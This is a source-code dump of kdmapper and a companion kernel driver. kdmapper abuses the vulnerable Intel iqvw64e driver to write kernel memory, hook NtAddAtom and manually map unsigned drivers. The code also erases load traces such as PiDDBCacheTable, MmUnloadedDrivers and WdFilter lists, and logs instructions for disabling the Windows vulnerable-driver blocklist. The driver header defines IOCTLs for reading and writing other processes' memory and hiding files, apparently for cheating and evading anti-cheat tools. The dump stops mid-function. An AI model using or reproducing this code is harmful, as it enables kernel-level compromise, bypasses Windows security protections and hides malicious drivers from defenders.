if (*szMask == 'x' && *pData != *bMask) 89 | return 0; 90 | return (*szMask) == 0; 91 | } 92 | 93 | uintptr_t utils::FindPattern(uintptr_t dwAddress, uintptr_t dwLen, BYTE* bMask, const char* szMask) { 94 | size_t max_len = dwLen - strlen(szMask); 95 | for (uintptr_t i = 0; i < max_len; i++) 96 | if (bDataCompare((BYTE*)(dwAddress + i), bMask, szMask)) 97 | return (uintptr_t)(dwAddress + i); 98 | return 0; 99 | } 100 | 101 | PVOID utils::FindSection(const char* sectionName, uintptr_t modulePtr, PULONG size) { 102 | size_t namelength = strlen(sectionName); 103 | PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS)(modulePtr + ((PIMAGE_DOS_HEADER)modulePtr)->e_lfanew); 104 | PIMAGE_SECTION_HEADER sections = IMAGE_FIRST_SECTION(headers); 105 | for (DWORD i = 0; i < headers->FileHeader.NumberOfSections; ++i) { 106 | PIMAGE_SECTION_HEADER section = §ions[i]; 107 | if (memcmp(section->Name, sectionName, namelength) == 0 && 108 | namelength == strlen((char*)section->Name)) { 109 | if (!section->VirtualAddress) { 110 | return 0; 111 | } 112 | if (size) { 113 | *size = section->Misc.VirtualSize; 114 | } 115 | return (PVOID)(modulePtr + section->VirtualAddress); 116 | } 117 | } 118 | return 0; 119 | } 120 | 121 | std::wstring utils::GetCurrentAppFolder() { 122 | wchar_t buffer[1024]; 123 | GetModuleFileNameW(NULL, buffer, 1024); 124 | std::wstring::size_type pos = std::wstring(buffer).find_last_of(L"\\/"); 125 | return std::wstring(buffer).substr(0, pos); 126 | } -------------------------------------------------------------------------------- /kdmapper/service.cpp: -------------------------------------------------------------------------------- 1 | #include "service.hpp" 2 | #include 3 | #include 4 | #include 5 | 6 | #include "utils.hpp" 7 | #include "nt.hpp" 8 | 9 | bool service::RegisterAndStart(const std::wstring& driver_path, const std::wstring& serviceName) { 10 | const static DWORD ServiceTypeKernel = 1; 11 | const std::wstring servicesPath = L"SYSTEM\\CurrentControlSet\\Services\\" + serviceName; 12 | const std::wstring nPath = L"\\??\\" + driver_path; 13 | 14 | HKEY dservice; 15 | LSTATUS status = RegCreateKeyW(HKEY_LOCAL_MACHINE, servicesPath.c_str(), &dservice); //Returns Ok if already exists 16 | if (status != ERROR_SUCCESS) { 17 | Log("[-] Can't create service key" << std::endl); 18 | return false; 19 | } 20 | 21 | status = RegSetKeyValueW(dservice, NULL, L"ImagePath", REG_EXPAND_SZ, nPath.c_str(), (DWORD)(nPath.size()*sizeof(wchar_t))); 22 | if (status != ERROR_SUCCESS) { 23 | RegCloseKey(dservice); 24 | Log("[-] Can't create 'ImagePath' registry value" << std::endl); 25 | return false; 26 | } 27 | 28 | status = RegSetKeyValueW(dservice, NULL, L"Type", REG_DWORD, &ServiceTypeKernel, sizeof(DWORD)); 29 | if (status != ERROR_SUCCESS) { 30 | RegCloseKey(dservice); 31 | Log("[-] Can't create 'Type' registry value" << std::endl); 32 | return false; 33 | } 34 | 35 | RegCloseKey(dservice); 36 | 37 | HMODULE ntdll = GetModuleHandleA("ntdll.dll"); 38 | if (ntdll == NULL) { 39 | return false; 40 | } 41 | 42 | //auto RtlAdjustPrivilege = (nt::RtlAdjustPrivilege)GetProcAddress(ntdll, "RtlAdjustPrivilege"); 43 | //auto NtLoadDriver = (nt::NtLoadDriver)GetProcAddress(ntdll, "NtLoadDriver"); 44 | 45 | ULONG SE_LOAD_DRIVER_PRIVILEGE = 10UL; 46 | BOOLEAN SeLoadDriverWasEnabled; 47 | NTSTATUS Status = nt::RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, TRUE, FALSE, &SeLoadDriverWasEnabled); 48 | if (!NT_SUCCESS(Status)) { 49 | Log("Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. Make sure you are running as administrator." << std::endl); 50 | return false; 51 | } 52 | 53 | std::wstring wdriver_reg_path = L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\" + serviceName; 54 | UNICODE_STRING serviceStr; 55 | RtlInitUnicodeString(&serviceStr, wdriver_reg_path.c_str()); 56 | 57 | Status = nt::NtLoadDriver(&serviceStr); 58 | 59 | 60 | Log("[+] NtLoadDriver Status 0x" << std::hex << Status << std::endl); 61 | 62 | if (Status == 0xC0000603) { //STATUS_IMAGE_CERT_REVOKED 63 | Log("[-] Your vulnerable driver list is enabled and have blocked the driver loading, you must disable vulnerable driver list to use kdmapper with intel driver" << std::endl); 64 | Log("[-] Registry path to disable vulnerable driver list: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\CI\\Config" << std::endl); 65 | Log("[-] Set 'VulnerableDriverBlocklistEnable' as dword to 0" << std::endl); 66 | } 67 | else if (Status == 0xC0000022 || Status == 0xC000009A) { //STATUS_ACCESS_DENIED and STATUS_INSUFFICIENT_RESOURCES 68 | Log("[-] Access Denied or Insufficient Resources (0x" << std::hex << Status << "), Probably some anticheat or antivirus running blocking the load of vulnerable driver" << std::endl); 69 | } 70 | 71 | 72 | //Never should occur since kdmapper checks for "IsRunning" driver before 73 | if (Status == 0xC000010E) {// STATUS_IMAGE_ALREADY_LOADED 74 | return true; 75 | } 76 | 77 | return NT_SUCCESS(Status); 78 | } 79 | 80 | bool service::StopAndRemove(const std::wstring& serviceName) { 81 | HMODULE ntdll = GetModuleHandleA("ntdll.dll"); 82 | if (ntdll == NULL) 83 | return false; 84 | 85 | std::wstring wdriver_reg_path = L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\" + serviceName; 86 | UNICODE_STRING serviceStr; 87 | RtlInitUnicodeString(&serviceStr, wdriver_reg_path.c_str()); 88 | 89 | HKEY driver_service; 90 | std::wstring servicesPath = L"SYSTEM\\CurrentControlSet\\Services\\" + serviceName; 91 | LSTATUS status = RegOpenKeyW(HKEY_LOCAL_MACHINE, servicesPath.c_str(), &driver_service); 92 | if (status != ERROR_SUCCESS) { 93 | if (status == ERROR_FILE_NOT_FOUND) { 94 | return true; 95 | } 96 | return false; 97 | } 98 | RegCloseKey(driver_service); 99 | 100 | NTSTATUS st = nt::NtUnloadDriver(&serviceStr); 101 | Log("[+] NtUnloadDriver Status 0x" << std::hex << st << std::endl); 102 | if (st != ERROR_SUCCESS) { 103 | Log("[-] Driver Unload Failed!!" << std::endl); 104 | status = RegDeleteTreeW(HKEY_LOCAL_MACHINE, servicesPath.c_str()); 105 | return false; //lets consider unload fail as error because can cause problems with anti cheats later 106 | } 107 | 108 | 109 | status = RegDeleteTreeW(HKEY_LOCAL_MACHINE, servicesPath.c_str()); 110 | if (status != ERROR_SUCCESS) { 111 | return false; 112 | } 113 | return true; 114 | } 115 | -------------------------------------------------------------------------------- /kdmapper/intel_driver.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | 7 | #include "utils.hpp" 8 | #include "nt.hpp" 9 | 10 | namespace intel_driver 11 | { 12 | constexpr ULONG32 ioctl1 = 0x80862007; 13 | constexpr DWORD iqvw64e_timestamp = 0x5284EAC3; 14 | extern ULONG64 ntoskrnlAddr; 15 | 16 | 17 | bool ClearPiDDBCacheTable(HANDLE device_handle); 18 | bool ExAcquireResourceExclusiveLite(HANDLE device_handle, PVOID Resource, BOOLEAN wait); 19 | bool ExReleaseResourceLite(HANDLE device_handle, PVOID Resource); 20 | BOOLEAN RtlDeleteElementGenericTableAvl(HANDLE device_handle, PVOID Table, PVOID Buffer); 21 | PVOID RtlLookupElementGenericTableAvl(HANDLE device_handle, nt::PRTL_AVL_TABLE Table, PVOID Buffer); 22 | nt::PiDDBCacheEntry* LookupEntry(HANDLE device_handle, nt::PRTL_AVL_TABLE PiDDBCacheTable, ULONG timestamp, const wchar_t * name); 23 | PVOID ResolveRelativeAddress(HANDLE device_handle, _In_ PVOID Instruction, _In_ ULONG OffsetOffset, _In_ ULONG InstructionSize); 24 | bool AcquireDebugPrivilege(); 25 | 26 | uintptr_t FindPatternAtKernel(HANDLE device_handle, uintptr_t dwAddress, uintptr_t dwLen, BYTE* bMask, const char* szMask); 27 | uintptr_t FindSectionAtKernel(HANDLE device_handle, const char* sectionName, uintptr_t modulePtr, PULONG size); 28 | uintptr_t FindPatternInSectionAtKernel(HANDLE device_handle, const char* sectionName, uintptr_t modulePtr, BYTE* bMask, const char* szMask); 29 | 30 | bool ClearKernelHashBucketList(HANDLE device_handle); 31 | bool ClearWdFilterDriverList(HANDLE device_handle); 32 | 33 | bool IsRunning(); 34 | HANDLE Load(); 35 | bool Unload(HANDLE device_handle); 36 | 37 | bool MemCopy(HANDLE device_handle, uint64_t destination, uint64_t source, uint64_t size); 38 | bool SetMemory(HANDLE device_handle, uint64_t address, uint32_t value, uint64_t size); 39 | bool GetPhysicalAddress(HANDLE device_handle, uint64_t address, uint64_t* out_physical_address); 40 | uint64_t MapIoSpace(HANDLE device_handle, uint64_t physical_address, uint32_t size); 41 | bool UnmapIoSpace(HANDLE device_handle, uint64_t address, uint32_t size); 42 | bool ReadMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size); 43 | bool WriteMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size); 44 | bool WriteToReadOnlyMemory(HANDLE device_handle, uint64_t address, void* buffer, uint32_t size); 45 | /*added by herooyyy*/ 46 | uint64_t MmAllocateIndependentPagesEx(HANDLE device_handle, uint32_t size); 47 | bool MmFreeIndependentPages(HANDLE device_handle, uint64_t address, uint32_t size); 48 | BOOLEAN MmSetPageProtection(HANDLE device_handle, uint64_t address, uint32_t size, ULONG new_protect); 49 | 50 | uint64_t AllocatePool(HANDLE device_handle, nt::POOL_TYPE pool_type, uint64_t size); 51 | 52 | bool FreePool(HANDLE device_handle, uint64_t address); 53 | uint64_t GetKernelModuleExport(HANDLE device_handle, uint64_t kernel_module_base, const std::string& function_name); 54 | bool ClearMmUnloadedDrivers(HANDLE device_handle); 55 | std::wstring GetDriverNameW(); 56 | std::wstring GetDriverPath(); 57 | 58 | template 59 | bool CallKernelFunction(HANDLE device_handle, T* out_result, uint64_t kernel_function_address, const A ...arguments) { 60 | constexpr auto call_void = std::is_same_v; 61 | 62 | //if count of arguments is >4 fail 63 | static_assert(sizeof...(A) <= 4, "CallKernelFunction: Too many arguments, CallKernelFunction only can be called with 4 or less arguments"); 64 | 65 | if constexpr (!call_void) { 66 | if (!out_result) 67 | return false; 68 | } 69 | else { 70 | UNREFERENCED_PARAMETER(out_result); 71 | } 72 | 73 | if (!kernel_function_address) 74 | return false; 75 | 76 | // Setup function call 77 | HMODULE ntdll = GetModuleHandleA("ntdll.dll"); 78 | if (ntdll == 0) { 79 | Log(L"[-] Failed to load ntdll.dll" << std::endl); //never should happens 80 | return false; 81 | } 82 | 83 | const auto NtAddAtom = reinterpret_cast(GetProcAddress(ntdll, "NtAddAtom")); 84 | if (!NtAddAtom) 85 | { 86 | Log(L"[-] Failed to get export ntdll.NtAddAtom" << std::endl); 87 | return false; 88 | } 89 | 90 | uint8_t kernel_injected_jmp[] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 }; 91 | uint8_t original_kernel_function[sizeof(kernel_injected_jmp)]; 92 | *(uint64_t*)&kernel_injected_jmp[2] = kernel_function_address; 93 | 94 | static uint64_t kernel_NtAddAtom = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "NtAddAtom"); 95 | if (!kernel_NtAddAtom) { 96 | Log(L"[-] Failed to get export ntoskrnl.NtAddAtom" << std::endl); 97 | return false; 98 | } 99 | 100 | if (!ReadMemory(device_handle, kernel_NtAddAtom, &original_kernel_function, sizeof(kernel_injected_jmp))) 101 | return false; 102 | 103 | if (original_kernel_function[0] == kernel_injected_jmp[0] && 104 | original_kernel_function[1] == kernel_injected_jmp[1] && 105 | original_kernel_function[sizeof(kernel_injected_jmp) - 2] == kernel_injected_jmp[sizeof(kernel_injected_jmp) - 2] && 106 | original_kernel_function[sizeof(kernel_injected_jmp) - 1] == kernel_injected_jmp[sizeof(kernel_injected_jmp) - 1]) { 107 | Log(L"[-] FAILED!: The code was already hooked!! another instance of kdmapper running?!" << std::endl); 108 | return false; 109 | } 110 | 111 | // Overwrite the pointer with kernel_function_address 112 | if (!WriteToReadOnlyMemory(device_handle, kernel_NtAddAtom, &kernel_injected_jmp, sizeof(kernel_injected_jmp))) 113 | return false; 114 | 115 | // Call function 116 | if constexpr (!call_void) { 117 | using FunctionFn = T(__stdcall*)(A...); 118 | const auto Function = reinterpret_cast(NtAddAtom); 119 | 120 | *out_result = Function(arguments...); 121 | } 122 | else { 123 | using FunctionFn = void(__stdcall*)(A...); 124 | const auto Function = reinterpret_cast(NtAddAtom); 125 | 126 | Function(arguments...); 127 | } 128 | 129 | // Restore the pointer/jmp 130 | return WriteToReadOnlyMemory(device_handle, kernel_NtAddAtom, original_kernel_function, sizeof(kernel_injected_jmp)); 131 | } 132 | } 133 | -------------------------------------------------------------------------------- /project/driver.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | DllMode 10 | ARM64 11 | 12 | 13 | DllMode 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | Debug 22 | ARM64 23 | 24 | 25 | Release 26 | ARM64 27 | 28 | 29 | 30 | {D59F7487-8398-D47A-449B-5D462CE5E701} 31 | {1bc93793-694f-48fe-9372-81e2b05556fd} 32 | v4.5 33 | 12.0 34 | Debug 35 | x64 36 | driver 37 | $(LatestTargetPlatformVersion) 38 | driver 39 | 40 | 41 | 42 | Windows10 43 | true 44 | WindowsKernelModeDriver10.0 45 | Driver 46 | KMDF 47 | Universal 48 | 49 | 50 | Windows10 51 | false 52 | WindowsKernelModeDriver10.0 53 | Driver 54 | KMDF 55 | Universal 56 | Spectre 57 | 58 | 59 | Windows10 60 | true 61 | WindowsKernelModeDriver10.0 62 | Driver 63 | KMDF 64 | Universal 65 | 66 | 67 | Windows10 68 | false 69 | WindowsKernelModeDriver10.0 70 | Driver 71 | KMDF 72 | Universal 73 | 74 | 75 | 76 | 77 | 78 | v143 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | DbgengKernelDebugger 90 | $(SolutionDir)build\driver\ 91 | $(SolutionDir)intermediates\driver\ 92 | 93 | 94 | DbgengKernelDebugger 95 | $(SolutionDir)build\driver\ 96 | $(SolutionDir)intermediates\driver\ 97 | 98 | 99 | DbgengKernelDebugger 100 | 101 | 102 | DbgengKernelDebugger 103 | 104 | 105 | 106 | sha256 107 | 108 | 109 | 110 | 111 | sha256 112 | 113 | 114 | DriverEntry 115 | false 116 | ntoskrnl.lib;%(AdditionalDependencies) 117 | 118 | 119 | false 120 | false 121 | 122 | 123 | 124 | 125 | sha256 126 | 127 | 128 | 129 | 130 | sha256 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | -------------------------------------------------------------------------------- /kdmapper/kdmapper.cpp: -------------------------------------------------------------------------------- 1 | #include "kdmapper.hpp" 2 | #include 3 | #include 4 | 5 | #include "utils.hpp" 6 | #include "intel_driver.hpp" 7 | #include "nt.hpp" 8 | #include "portable_executable.hpp" 9 | 10 | ULONG64 AllocIndependentPages(HANDLE device_handle, ULONG32 size) 11 | { 12 | const auto base = intel_driver::MmAllocateIndependentPagesEx(device_handle, size); 13 | if (!base) 14 | { 15 | Log(L"[-] Error allocating independent pages" << std::endl); 16 | return 0; 17 | } 18 | 19 | if (!intel_driver::MmSetPageProtection(device_handle, base, size, PAGE_EXECUTE_READWRITE)) 20 | { 21 | Log(L"[-] Failed to change page protections" << std::endl); 22 | intel_driver::MmFreeIndependentPages(device_handle, base, size); 23 | return 0; 24 | } 25 | 26 | return base; 27 | } 28 | 29 | void RelocateImageByDelta(portable_executable::vec_relocs relocs, const ULONG64 delta) { 30 | for (const auto& current_reloc : relocs) { 31 | for (auto i = 0u; i < current_reloc.count; ++i) { 32 | const uint16_t type = current_reloc.item[i] >> 12; 33 | const uint16_t offset = current_reloc.item[i] & 0xFFF; 34 | 35 | if (type == IMAGE_REL_BASED_DIR64) 36 | *reinterpret_cast(current_reloc.address + offset) += delta; 37 | } 38 | } 39 | } 40 | 41 | // Fix cookie by @Jerem584 42 | bool FixSecurityCookie(void* local_image, ULONG64 kernel_image_base) 43 | { 44 | auto headers = portable_executable::GetNtHeaders(local_image); 45 | if (!headers) 46 | return false; 47 | 48 | auto load_config_directory = headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG].VirtualAddress; 49 | if (!load_config_directory) 50 | { 51 | Log(L"[+] Load config directory wasn't found, probably StackCookie not defined, fix cookie skipped" << std::endl); 52 | return true; 53 | } 54 | 55 | auto load_config_struct = (PIMAGE_LOAD_CONFIG_DIRECTORY)((uintptr_t)local_image + load_config_directory); 56 | auto stack_cookie = load_config_struct->SecurityCookie; 57 | if (!stack_cookie) 58 | { 59 | Log(L"[+] StackCookie not defined, fix cookie skipped" << std::endl); 60 | return true; // as I said, it is not an error and we should allow that behavior 61 | } 62 | 63 | stack_cookie = stack_cookie - (uintptr_t)kernel_image_base + (uintptr_t)local_image; //since our local image is already relocated the base returned will be kernel address 64 | 65 | if (*(uintptr_t*)(stack_cookie) != 0x2B992DDFA232) { 66 | Log(L"[-] StackCookie already fixed!? this probably wrong" << std::endl); 67 | return false; 68 | } 69 | 70 | Log(L"[+] Fixing stack cookie" << std::endl); 71 | 72 | auto new_cookie = 0x2B992DDFA232 ^ GetCurrentProcessId() ^ GetCurrentThreadId(); // here we don't really care about the value of stack cookie, it will still works and produce nice result 73 | if (new_cookie == 0x2B992DDFA232) 74 | new_cookie = 0x2B992DDFA233; 75 | 76 | *(uintptr_t*)(stack_cookie) = new_cookie; // the _security_cookie_complement will be init by the driver itself if they use crt 77 | return true; 78 | } 79 | 80 | bool ResolveImports(HANDLE iqvw64e_device_handle, portable_executable::vec_imports imports) { 81 | for (const auto& current_import : imports) { 82 | ULONG64 Module = utils::GetKernelModuleAddress(current_import.module_name); 83 | if (!Module) { 84 | #if !defined(DISABLE_OUTPUT) 85 | std::cout << "[-] Dependency " << current_import.module_name << " wasn't found" << std::endl; 86 | #endif 87 | return false; 88 | } 89 | 90 | for (auto& current_function_data : current_import.function_datas) { 91 | ULONG64 function_address = intel_driver::GetKernelModuleExport(iqvw64e_device_handle, Module, current_function_data.name); 92 | 93 | if (!function_address) { 94 | //Lets try with ntoskrnl 95 | if (Module != intel_driver::ntoskrnlAddr) { 96 | function_address = intel_driver::GetKernelModuleExport(iqvw64e_device_handle, intel_driver::ntoskrnlAddr, current_function_data.name); 97 | if (!function_address) { 98 | #if !defined(DISABLE_OUTPUT) 99 | std::cout << "[-] Failed to resolve import " << current_function_data.name << " (" << current_import.module_name << ")" << std::endl; 100 | #endif 101 | return false; 102 | } 103 | } 104 | } 105 | 106 | *current_function_data.address = function_address; 107 | } 108 | } 109 | 110 | return true; 111 | } 112 | 113 | ULONG64 kdmapper::MapDriver(HANDLE iqvw64e_device_handle, BYTE* data, ULONG64 param1, ULONG64 param2, bool free, bool destroyHeader, AllocationMode mode, bool PassAllocationAddressAsFirstParam, mapCallback callback, NTSTATUS* exitCode) { 114 | 115 | const PIMAGE_NT_HEADERS64 nt_headers = portable_executable::GetNtHeaders(data); 116 | 117 | if (!nt_headers) { 118 | Log(L"[-] Invalid format of PE image" << std::endl); 119 | return 0; 120 | } 121 | 122 | if (nt_headers->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) { 123 | Log(L"[-] Image is not 64 bit" << std::endl); 124 | return 0; 125 | } 126 | 127 | ULONG32 image_size = nt_headers->OptionalHeader.SizeOfImage; 128 | 129 | void* local_image_base = VirtualAlloc(nullptr, image_size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 130 | if (!local_image_base) 131 | return 0; 132 | 133 | DWORD TotalVirtualHeaderSize = (IMAGE_FIRST_SECTION(nt_headers))->VirtualAddress; 134 | image_size = image_size - (destroyHeader ? TotalVirtualHeaderSize : 0); 135 | 136 | ULONG64 kernel_image_base = 0; 137 | if (mode == AllocationMode::AllocateIndependentPages) { 138 | kernel_image_base = AllocIndependentPages(iqvw64e_device_handle, image_size); 139 | } 140 | else { // AllocatePool by default 141 | kernel_image_base = intel_driver::AllocatePool(iqvw64e_device_handle, nt::POOL_TYPE::NonPagedPool, image_size); 142 | } 143 | 144 | if (!kernel_image_base) { 145 | Log(L"[-] Failed to allocate remote image in kernel" << std::endl); 146 | 147 | VirtualFree(local_image_base, 0, MEM_RELEASE); 148 | return 0; 149 | } 150 | 151 | do { 152 | Log(L"[+] Image base has been allocated at 0x" << reinterpret_cast(kernel_image_base) << std::endl); 153 | 154 | // Copy image headers 155 | 156 | memcpy(local_image_base, data, nt_headers->OptionalHeader.SizeOfHeaders); 157 | 158 | // Copy image sections 159 | 160 | const PIMAGE_SECTION_HEADER current_image_section = IMAGE_FIRST_SECTION(nt_headers); 161 | 162 | for (auto i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) { 163 | if ((current_image_section[i].Characteristics & IMAGE_SCN_CNT_UNINITIALIZED_DATA) > 0) 164 | continue; 165 | auto local_section = reinterpret_cast(reinterpret_cast(local_image_base) + current_image_section[i].VirtualAddress); 166 | memcpy(local_section, reinterpret_cast(reinterpret_cast(data) + current_image_section[i].PointerToRawData), current_image_section[i].SizeOfRawData); 167 | } 168 | 169 | ULONG64 realBase = kernel_image_base; 170 | if (destroyHeader) { 171 | kernel_image_base -= TotalVirtualHeaderSize; 172 | Log(L"[+] Skipped 0x" << std::hex << TotalVirtualHeaderSize << L" bytes of PE Header" << std::endl); 173 | } 174 | 175 | // Resolve relocs and imports 176 | 177 | RelocateImageByDelta(portable_executable::GetRelocs(local_image_base), kernel_image_base - nt_headers->OptionalHeader.ImageBase); 178 | 179 | if (!FixSecurityCookie(local_image_base, kernel_image_base )) 180 | { 181 | Log(L"[-] Failed to fix cookie" << std::endl); 182 | return 0; 183 | } 184 | 185 | if (!ResolveImports(iqvw64e_device_handle, portable_executable::GetImports(local_image_base))) { 186 | Log(L"[-] Failed to resolve imports" << std::endl); 187 | kernel_image_base = realBase; 188 | break; 189 | } 190 | 191 | // Write fixed image to kernel 192 | 193 | if (!intel_driver::WriteMemory(iqvw64e_device_handle, realBase, (PVOID)((uintptr_t)local_image_base + (destroyHeader ? TotalVirtualHeaderSize : 0)), image_size)) { 194 | Log(L"[-] Failed to write local image to remote image" << std::endl); 195 | kernel_image_base = realBase; 196 | break; 197 | } 198 | 199 | // Call driver entry point 200 | 201 | const ULONG64 address_of_entry_point = kernel_image_base + nt_headers->OptionalHeader.AddressOfEntryPoint; 202 | 203 | Log(L"[<] Calling DriverEntry 0x" << reinterpret_cast(address_of_entry_point) << std::endl); 204 | 205 | if (callback) { 206 | if (!callback(¶m1, ¶m2, realBase, image_size)) { 207 | Log(L"[-] Callback returns false, failed!" << std::endl); 208 | kernel_image_base = realBase; 209 | break; 210 | } 211 | } 212 | 213 | NTSTATUS status = 0; 214 | if (!intel_driver::CallKernelFunction(iqvw64e_device_handle, &status, address_of_entry_point, (PassAllocationAddressAsFirstParam ? realBase : param1), param2)) { 215 | Log(L"[-] Failed to call driver entry" << std::endl); 216 | kernel_image_base = realBase; 217 | break; 218 | } 219 | 220 | if (exitCode) 221 | *exitCode = status; 222 | 223 | Log(L"[+] DriverEntry returned 0x" << std::hex << status << std::endl); 224 | 225 | // Free memory 226 | if (free) { 227 | Log(L"[+] Freeing memory" << std::endl); 228 | bool free_status = false; 229 | 230 | if (mode == AllocationMode::AllocateIndependentPages) 231 | { 232 | free_status = intel_driver::MmFreeIndependentPages(iqvw64e_device_handle, realBase, image_size); 233 | } 234 | else { 235 | free_status = intel_driver::FreePool(iqvw64e_device_handle, realBase); 236 | } 237 | 238 | if (free_status) { 239 | Log(L"[+] Memory has been released" << std::endl); 240 | } 241 | else { 242 | Log(L"[-] WARNING: Failed to free memory!" << std::endl); 243 | } 244 | } 245 | 246 | 247 | 248 | VirtualFree(local_image_base, 0, MEM_RELEASE); 249 | return realBase; 250 | 251 | } while (false); 252 | 253 | 254 | VirtualFree(local_image_base, 0, MEM_RELEASE); 255 | 256 | Log(L"[+] Freeing memory" << std::endl); 257 | bool free_status = false; 258 | 259 | if (mode == AllocationMode::AllocateIndependentPages) 260 | { 261 | free_status = intel_driver::MmFreeIndependentPages(iqvw64e_device_handle, kernel_image_base, image_size); 262 | } 263 | else { 264 | free_status = intel_driver::FreePool(iqvw64e_device_handle, kernel_image_base); 265 | } 266 | 267 | if (free_status) { 268 | Log(L"[+] Memory has been released" << std::endl); 269 | } 270 | else { 271 | Log(L"[-] WARNING: Failed to free memory!" << std::endl); 272 | } 273 | 274 | return 0; 275 | } 276 | 277 | 278 | -------------------------------------------------------------------------------- /project/source/definitions.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "winver.h" 4 | 5 | // 名称常量 6 | #define DRIVER_NAME L"\\Driver\\RickOwens00" 7 | #define DEVICE_NAME L"\\Device\\RickOwens00" 8 | #define SYMBOLIC_LINK L"\\DosDevices\\RickOwens00" 9 | 10 | // 代码 11 | #define PRW_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec33, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // 物理读写 12 | #define VRW_ATTACH_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec34, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // 虚拟读写附加代码 13 | #define VRW_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec35, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // 虚拟读写 14 | #define BA_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec36, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // 基址 15 | #define GR_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec37, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // 获取守卫区域 16 | #define HF_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec38, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // TODO 17 | #define SECURITY_CODE 0x94c9e4bc3 // 安全代码可防止未经授权的访问 18 | 19 | // PMASK 例子 '0xFFFFFFFFFFFFFF00' 20 | static const UINT64 PMASK = (~0xfull << 8) & 0xfffffffffull; 21 | 22 | // 请求结构 23 | typedef struct _PRW { 24 | // 安全码 25 | UINT64 SecurityCode; 26 | 27 | // 实际数据 28 | UINT32 ProcessID; 29 | UINT64 Address; 30 | UINT64 Buffer; 31 | SIZE_T Size; 32 | SIZE_T ReturnSize; 33 | 34 | BOOLEAN Type; 35 | 36 | // 变量和指针声明 37 | } physical_rw, * p_physical_rw; 38 | 39 | typedef struct _VRW { 40 | // 安全码 41 | UINT64 SecurityCode; 42 | 43 | // 实际数据 44 | HANDLE ProcessHandle; 45 | PVOID Address; 46 | PVOID Buffer; 47 | SIZE_T Size; 48 | SIZE_T return_size; 49 | 50 | BOOLEAN Type; 51 | 52 | // 变量和指针声明 53 | } virtual_rw, * p_virtual_rw; 54 | 55 | typedef struct _BA { 56 | // 安全码 57 | UINT64 SecurityCode; 58 | 59 | // 实际数据 60 | INT32 process_id; 61 | ULONGLONG* Address; // (out) 62 | 63 | // 变量和指针声明 64 | } base_address, * p_base_address; 65 | 66 | typedef struct _GR { 67 | // 安全码 68 | UINT64 SecurityCode; 69 | 70 | // 实际数据 71 | ULONGLONG* Address; // (out) 72 | 73 | // 变量和指针声明 74 | } guarded_region, * p_guarded_region; 75 | 76 | typedef struct _hf { 77 | // 安全码 78 | UINT64 security_code; 79 | 80 | // 实际数据 81 | INT32 process_id; 82 | 83 | // 变量和指针声明 84 | } hide_file, * p_hide_file; 85 | 86 | // 未记录的 Win32 API 函数定义 87 | typedef struct _SYSTEM_BIGPOOL_ENTRY { 88 | PVOID VirtualAddress; 89 | ULONG_PTR NonPaged : 1; 90 | ULONG_PTR SizeInBytes; 91 | UCHAR Tag[4]; 92 | } SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY; 93 | 94 | typedef struct _SYSTEM_BIGPOOL_INFORMATION { 95 | ULONG Count; 96 | SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1]; 97 | } SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION; 98 | 99 | typedef enum _SYSTEM_INFORMATION_CLASS { 100 | SystemBigPoolInformation = 0x42, 101 | } SYSTEM_INFORMATION_CLASS; 102 | 103 | extern "C" { 104 | NTKERNELAPI NTSTATUS IoCreateDriver( 105 | PUNICODE_STRING DriverName, 106 | PDRIVER_INITIALIZE InitializationFunction 107 | ); 108 | 109 | NTKERNELAPI NTSTATUS MmCopyVirtualMemory( 110 | PEPROCESS SourceProcess, 111 | PVOID SourceAddress, 112 | PEPROCESS TargetProcess, 113 | PVOID TargetAddress, 114 | SIZE_T BufferSize, 115 | KPROCESSOR_MODE PreviousMode, 116 | PSIZE_T ReturnSize 117 | ); 118 | 119 | PVOID NTAPI PsGetProcessSectionBaseAddress( 120 | PEPROCESS Process 121 | ); 122 | 123 | NTSTATUS NTAPI ZwQuerySystemInformation( 124 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 125 | PVOID SystemInformation, 126 | ULONG SystemInformationLength, 127 | PULONG ReturnLength 128 | ); 129 | } 130 | 131 | namespace driver_functions { 132 | // 开始 (Physical Functions) 133 | NTSTATUS read_physical(PVOID Address, PVOID buffer, SIZE_T size, SIZE_T* bytes_read) 